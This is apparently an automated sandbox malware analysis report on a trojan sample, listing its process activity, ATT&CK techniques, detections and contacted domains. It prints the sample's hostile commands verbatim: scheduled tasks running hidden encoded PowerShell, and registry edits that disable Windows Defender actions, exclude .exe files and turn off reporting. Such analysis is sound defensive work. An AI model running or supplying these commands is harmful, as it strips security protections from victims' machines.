Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gbyyeslrl" /sc once /st 15:13:59 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows 
defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 
Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 21 Command and Scripting Interpreter; 11 Scheduled Task/Job; 1 Native API; 2 PowerShell; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 11 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 11 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 2 Masquerading; 1 Disable or Modify Tools; 1 Modify Registry; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 121 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 4 File and Directory Discovery; 23 System Information Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior graph (figure): ID: 753408; Sample: file.exe; Startdate: 24/11/2022; Architecture: WINDOWS; Score: 100

Source | Detection | Scanner | Label
file.exe | 39% | ReversingLabs | Win32.Trojan.Jaik

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe | 41% | ReversingLabs | Win32.Trojan.Jaik
C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe | 51% | ReversingLabs | Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe | 51% | ReversingLabs | Win32.Trojan.Zusy
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe | 51% | ReversingLabs | Win32.Trojan.Zusy

Source | Detection | Scanner | Label
2.0.Install.exe.3f0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
37.2.pdyDoIJ.exe.a0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
37.0.pdyDoIJ.exe.a0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
2.2.Install.exe.3f0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601

Source | Detection | Scanner | Label
service-domain.xyz | 11% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.microsoft.co | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | 0% | URL Reputation | safe
http://crl.micr | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
service-domain.xyz | 3.80.150.121 | true | true | | unknown
clients.l.google.com | 142.250.203.110 | true | false | | high
clients2.google.com | unknown | unknown | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.co | powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micr | powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

                  No contacted IP infos
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:753408
                  Start date and time:2022-11-24 19:13:21 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 58s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:file.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:59
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@89/15@2/0
                  EGA Information:
                  • Successful, ratio: 40%
                  HDC Information:
                  • Successful, ratio: 100% (good quality ratio 97.7%)
                  • Quality average: 84.6%
                  • Quality standard deviation: 22.8%
                  HCA Information:
                  • Successful, ratio: 65%
                  • Number of executed functions: 192
                  • Number of non-executed functions: 27
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 172.217.168.74, 142.250.203.106, 216.58.215.234, 172.217.168.10, 172.217.168.42
                  • Excluded domains from analysis (whitelisted): www.bing.com, files.testupdate.info, fs.microsoft.com, ocsp.digicert.com, login.live.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.testupdate.info, www.googleapis.com, api5.check-data.xyz
                  • Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
